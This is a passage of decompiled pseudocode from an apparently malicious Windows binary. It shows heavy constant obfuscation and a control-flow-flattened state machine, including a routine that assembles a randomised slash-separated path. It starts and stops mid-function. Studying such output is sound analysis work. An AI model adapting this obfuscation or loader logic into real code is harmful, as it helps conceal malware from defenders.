                                              				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
                                              				_t806 = 0x2ca20b85;
                                              				 *(_t950 + 0x9c) = 0xada2;
                                              				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
                                              				_t920 = 0x73;
                                              				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
                                              				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
                                              				 *(_t950 + 0x98) = 0x829e;
                                              				_t921 = 0x5b;
                                              				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
                                              				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
                                              				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
                                              				 *(_t950 + 0x7c) = 0xdccb;
                                              				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
                                              				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
                                              				 *(_t950 + 0xb4) = 0xef7d;
                                              				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
                                              				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
                                              				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
                                              				 *(_t950 + 0xe8) = 0xccb1;
                                              				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
                                              				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
                                              				 *(_t950 + 0x74) = 0xc511;
                                              				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
                                              				_t922 = 0x69;
                                              				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
                                              				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
                                              				 *(_t950 + 0xa4) = 0x943d;
                                              				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
                                              				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
                                              				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
                                              				 *(_t950 + 0x114) = 0x676a;
                                              				_t923 = 0xb;
                                              				 *(_t950 + 0x130) = 0;
                                              				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
                                              				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
                                              				 *(_t950 + 0x4c) = 0x9f6f;
                                              				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
                                              				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
                                              				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
                                              				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
                                              				 *(_t950 + 0x44) = 0xfa80;
                                              				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
                                              				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
                                              				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
                                              				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
                                              				 *(_t950 + 0xec) = 0x5cda;
                                              				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
                                              				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
                                              				 *(_t950 + 0x2c) = 0x6ba5;
                                              				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
                                              				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
                                              				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
                                              				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
                                              				 *(_t950 + 0xb4) = 0xc1db;
                                              				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
                                              				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
                                              				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
                                              				 *(_t950 + 0xf0) = 0xa853;
                                              				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
                                              				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
                                              				 *(_t950 + 0xe8) = 0x787f;
                                              				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
                                              				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
                                              				 *(_t950 + 0xa8) = 0xf94e;
                                              				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
                                              				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
                                              				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
                                              				 *(_t950 + 0x118) = 0x6b15;
                                              				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
                                              				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
                                              				 *(_t950 + 0x10c) = 0x9660;
                                              				_t804 = 0x3f;
                                              				_t924 = 0x1c;
                                              				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
                                              				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
                                              				 *(_t950 + 0x8c) = 0x9ebc;
                                              				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
                                              				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
                                              				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
                                              				 *(_t950 + 0x124) = 0x986;
                                              				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
                                              				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
                                              				 *(_t950 + 0x84) = 0x3532;
                                              				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
                                              				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
                                              				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
                                              				 *(_t950 + 0xa4) = 0x41f;
                                              				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
                                              				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
                                              				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
                                              				 *(_t950 + 0x108) = 0x3cbe;
                                              				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
                                              				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
                                              				 *(_t950 + 0x68) = 0xe725;
                                              				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
                                              				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
                                              				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
                                              				 *(_t950 + 0xb8) = 0xbf58;
                                              				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
                                              				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
                                              				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
                                              				 *(_t950 + 0x100) = 0xd5da;
                                              				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
                                              				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
                                              				 *(_t950 + 0x54) = 0x395a;
                                              				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
                                              				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
                                              				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
                                              				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
                                              				 *(_t950 + 0xd4) = 0x77ed;
                                              				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
                                              				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
                                              				 *(_t950 + 0x114) = 0x68ca;
                                              				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
                                              				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
                                              				 *(_t950 + 0xdc) = 0x2f2e;
                                              				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
                                              				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
                                              				 *(_t950 + 0x24) = 0x5bdf;
                                              				_t925 = 0xa;
                                              				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
                                              				_t926 = 0x47;
                                              				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
                                              				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
                                              				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
                                              				 *(_t950 + 0x40) = 0xbbeb;
                                              				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
                                              				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
                                              				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
                                              				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
                                              				 *(_t950 + 0xb0) = 0x7d23;
                                              				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
                                              				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
                                              				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
                                              				 *(_t950 + 0x60) = 0xae03;
                                              				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
                                              				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
                                              				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
                                              				 *(_t950 + 0xe4) = 0xc6a2;
                                              				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
                                              				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
                                              				 *(_t950 + 0x5c) = 0xaf00;
                                              				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
                                              				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
                                              				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
                                              				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
                                              				 *(_t950 + 0x24) = 0xf54a;
                                              				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
                                              				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
                                              				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
                                              				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
                                              				 *(_t950 + 0x124) = 0xcc46;
                                              				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
                                              				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
                                              				 *(_t950 + 0x12c) = 0x5a4b;
                                              				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
                                              				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
                                              				 *(_t950 + 0x34) = 0x6135;
                                              				_t927 = 0xf;
                                              				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
                                              				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
                                              				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
                                              				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
                                              				 *(_t950 + 0xfc) = 0x664c;
                                              				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
                                              				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
                                              				 *(_t950 + 0x7c) = 0x54c3;
                                              				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
                                              				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
                                              				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
                                              				 *(_t950 + 0x28) = 0x1122;
                                              				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
                                              				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
                                              				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
                                              				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
                                              				 *(_t950 + 0x40) = 0x14c1;
                                              				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
                                              				_t928 = 0x27;
                                              				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
                                              				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
                                              				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
                                              				 *(_t950 + 0x3c) = 0x8f59;
                                              				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
                                              				_t929 = 7;
                                              				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
                                              				_t930 = 0x30;
                                              				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
                                              				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
                                              				 *(_t950 + 0x108) = 0x8114;
                                              				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
                                              				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
                                              				 *(_t950 + 0x68) = 0x1eec;
                                              				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
                                              				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
                                              				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
                                              				 *(_t950 + 0x64) = 0x2753;
                                              				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
                                              				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
                                              				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
                                              				 *(_t950 + 0x1c) = 0xf5b7;
                                              				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
                                              				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
                                              				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
                                              				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
                                              				 *(_t950 + 0x38) = 0x2f43;
                                              				_t931 = 0x4b;
                                              				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
                                              				_t932 = 0x3a;
                                              				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
                                              				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
                                              				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
                                              				 *(_t950 + 0xf8) = 0xec82;
                                              				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
                                              				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
                                              				 *(_t950 + 0x94) = 0xef51;
                                              				_t933 = 0x32;
                                              				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
                                              				_t934 = 0x11;
                                              				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
                                              				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
                                              				 *(_t950 + 0xc8) = 0xb312;
                                              				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
                                              				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
                                              				 *(_t950 + 0x98) = 0x3fa5;
                                              				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
                                              				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
                                              				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
                                              				 *(_t950 + 0x50) = 0xcffd;
                                              				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
                                              				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
                                              				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
                                              				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
                                              				 *(_t950 + 0xd8) = 0x2cbc;
                                              				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
                                              				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
                                              				 *(_t950 + 0x48) = 0xee7b;
                                              				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
                                              				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
                                              				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
                                              				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
                                              				 *(_t950 + 0xd0) = 0xc42e;
                                              				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
                                              				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
                                              				 *(_t950 + 0xcc) = 0xa2cf;
                                              				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
                                              				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
                                              				 *(_t950 + 0x11c) = 0xb9db;
                                              				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
                                              				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
                                              				 *(_t950 + 0x88) = 0xfaa3;
                                              				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
                                              				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
                                              				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
                                              				 *(_t950 + 0xc0) = 0xa294;
                                              				_t935 = 0x7e;
                                              				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
                                              				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
                                              				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
                                              				 *(_t950 + 0x80) = 0xa0b2;
                                              				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
                                              				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
                                              				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
                                              				 *(_t950 + 0x74) = 0x61f;
                                              				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
                                              				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
                                              				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
                                              				 *(_t950 + 0x1c) = 0xc0d2;
                                              				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
                                              				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
                                              				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
                                              				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
                                              				 *(_t950 + 0x70) = 0xbc2e;
                                              				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
                                              				_t936 = 0x17;
                                              				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
                                              				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
                                              				 *(_t950 + 0xfc) = 0xf001;
                                              				_t937 = 0x14;
                                              				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
                                              				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
                                              				 *(_t950 + 0xc4) = 0x7c98;
                                              				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
                                              				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
                                              				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
                                              				 *(_t950 + 0xbc) = 0xfd89;
                                              				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
                                              				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
                                              				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
                                              				_t805 =  *(_t950 + 0x13c);
                                              				 *(_t950 + 0x10) =  *(_t950 + 0x140);
                                              				while(1) {
                                              					L1:
                                              					_t896 =  *(_t950 + 0x14);
                                              					while(1) {
                                              						L2:
                                              						while(1) {
                                              							L3:
                                              							_t954 = _t806 - 0x1dc05553;
                                              							if(_t954 > 0) {
                                              								goto L27;
                                              							}
                                              							L4:
                                              							if(_t954 == 0) {
                                              								_push( *((intOrPtr*)(_t950 + 0x120)));
                                              								E002229E3(_t950 + 0x274, 0x400, E0023889D(0x23c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
                                              								_t950 = _t950 + 0x24;
                                              								E00232025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
                                              								_t751 =  *(_t950 + 0x18);
                                              								_t806 = 0x23448a49;
                                              								while(1) {
                                              									L1:
                                              									_t896 =  *(_t950 + 0x14);
                                              									goto L2;
                                              								}
                                              							} else {
                                              								_t955 = _t806 - 0x160634a6;
                                              								if(_t955 > 0) {
                                              									__eflags = _t806 - 0x16d97506;
                                              									if(_t806 == 0x16d97506) {
                                              										E0022F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
                                              										_t806 = 0x36d580c3;
                                              										goto L13;
                                              									} else {
                                              										__eflags = _t806 - 0x1a0940a4;
                                              										if(_t806 == 0x1a0940a4) {
                                              											E0022839D(_t950 + 0x170, _t917);
                                              											_t806 = 0x1dc05553;
                                              											goto L13;
                                              										} else {
                                              											__eflags = _t806 - 0x1a22d724;
                                              											if(_t806 != 0x1a22d724) {
                                              												goto L44;
                                              											} else {
                                              												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
                                              												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
                                              												_t832 = _t950 + 0x13c;
                                              												E0022C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
                                              												_t950 = _t950 + 0x28;
                                              												asm("sbb ecx, ecx");
                                              												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
                                              												goto L13;
                                              											}
                                              										}
                                              									}
                                              								} else {
                                              									if(_t955 == 0) {
                                              										 *(_t950 + 0x160) = _t751;
                                              										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
                                              										 *(_t950 + 0x160) = _t805;
                                              										E002296CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
                                              										_pop(_t836);
                                              										asm("sbb ecx, ecx");
                                              										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
                                              										goto L13;
                                              									} else {
                                              										if(_t806 == 0x6ef04) {
                                              											E0022F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
                                              											_t806 = 0x16d97506;
                                              											goto L13;
                                              										} else {
                                              											if(_t806 == 0x9a9cbcb) {
                                              												_push(_t806);
                                              												_push( *((intOrPtr*)(_t917 + 4)));
                                              												_t941 = E002378B7(_t806);
                                              												_t951 = _t950 + 4;
                                              												_t805 = E00228736(_t780);
                                              												__eflags = _t805;
                                              												if(__eflags != 0) {
                                              													_t751 = E00236B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
                                              													_t950 = _t951 + 0x14;
                                              													 *(_t950 + 0x10) = _t751;
                                              													__eflags = _t751;
                                              													if(__eflags == 0) {
                                              														_push(_t805);
                                              														_push( *(_t950 + 0xec));
                                              														_t903 =  *(_t950 + 0xf8);
                                              														_t817 =  *(_t950 + 0xbc);
                                              														L48:
                                              														E0022F536(_t817, _t903);
                                              													} else {
                                              														_t806 = 0x160634a6;
                                              														while(1) {
                                              															L1:
                                              															_t896 =  *(_t950 + 0x14);
                                              															goto L2;
                                              														}
                                              													}
                                              												}
                                              											} else {
                                              												if(_t806 == 0xb43f6cc) {
                                              													__eflags = E00239B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
                                              													_t946 =  !=  ? 1 : _t946;
                                              													_t806 = 0x2a19e3bf;
                                              													 *(_t950 + 0x130) = _t946;
                                              													L13:
                                              													_t751 =  *(_t950 + 0x10);
                                              													goto L14;
                                              												} else {
                                              													_t959 = _t806 - 0x13765d88;
                                              													if(_t806 != 0x13765d88) {
                                              														L44:
                                              														__eflags = _t806 - 0x1a8884c7;
                                              														if(__eflags != 0) {
                                              															L14:
                                              															_t896 =  *(_t950 + 0x14);
                                              															continue;
                                              														}
                                              													} else {
                                              														_push( *(_t950 + 0x108));
                                              														_t787 = E0023889D(0x23c660,  *(_t950 + 0xa8), _t959);
                                              														_t788 =  *0x23ca38; // 0x0
                                              														_t790 =  *0x23ca38; // 0x0
                                              														_t793 =  *0x23ca38; // 0x0
                                              														E00237C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
                                              														_t950 = _t950 + 0x2c;
                                              														E00232025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
                                              														_t799 =  *0x23ca38; // 0x0
                                              														_t806 = 0x261be6d7;
                                              														_t896 = ( *_t799)[4] & 0x0000ffff;
                                              														_t751 =  *(_t950 + 0x10);
                                              														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
                                              														L2:
                                              														L3:
                                              														_t954 = _t806 - 0x1dc05553;
                                              														if(_t954 > 0) {
                                              															goto L27;
                                              														}
                                              													}
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              							L49:
                                              							return _t946;
                                              							L27:
                                              							__eflags = _t806 - 0x23448a49;
                                              							if(_t806 == 0x23448a49) {
                                              								__eflags = E0023511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
                                              								if(__eflags == 0) {
                                              									_t806 = 0x6ef04;
                                              									goto L44;
                                              								} else {
                                              									_t806 = 0x1a22d724;
                                              									goto L13;
                                              								}
                                              							} else {
                                              								__eflags = _t806 - 0x261be6d7;
                                              								if(_t806 == 0x261be6d7) {
                                              									_t918 = _t950 + 0x270;
                                              									_t809 = 6;
                                              									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
                                              									__eflags = _t948;
                                              									while(__eflags != 0) {
                                              										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
                                              										E0022D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
                                              										_t950 = _t950 + 0x18;
                                              										_t919 = _t918 + _t945 * 2;
                                              										_t803 = 0x2f;
                                              										 *_t919 = _t803;
                                              										_t918 = _t919 + 2;
                                              										_t948 = _t948 - 1;
                                              										__eflags = _t948;
                                              									}
                                              									_t946 =  *(_t950 + 0x130);
                                              									 *_t918 = 0;
                                              									_t806 = 0x1a0940a4;
                                              									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
                                              									goto L1;
                                              								} else {
                                              									__eflags = _t806 - 0x2a19e3bf;
                                              									if(_t806 == 0x2a19e3bf) {
                                              										E0022F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
                                              										_t806 = 0x355eeb92;
                                              										goto L13;
                                              									} else {
                                              										__eflags = _t806 - 0x2ca20b85;
                                              										if(_t806 == 0x2ca20b85) {
                                              											 *(_t950 + 0x12c) = E00238C8F(_t806);
                                              											_t806 = 0x9a9cbcb;
                                              											goto L13;
                                              										} else {
                                              											__eflags = _t806 - 0x355eeb92;
                                              											if(_t806 == 0x355eeb92) {
                                              												E0022F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
                                              												_t806 = 0x6ef04;
                                              												goto L13;
                                              											} else {
                                              												__eflags = _t806 - 0x36d580c3;
                                              												if(_t806 == 0x36d580c3) {
                                              													_push(_t805);
                                              													_push( *(_t950 + 0xc0));
                                              													_t903 =  *(_t950 + 0xcc);
                                              													_t817 =  *(_t950 + 0x100);
                                              													goto L48;
